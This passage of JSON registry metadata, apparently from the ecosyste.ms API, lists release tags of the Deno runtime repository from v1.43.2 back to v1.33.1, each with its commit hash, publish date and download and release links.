v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/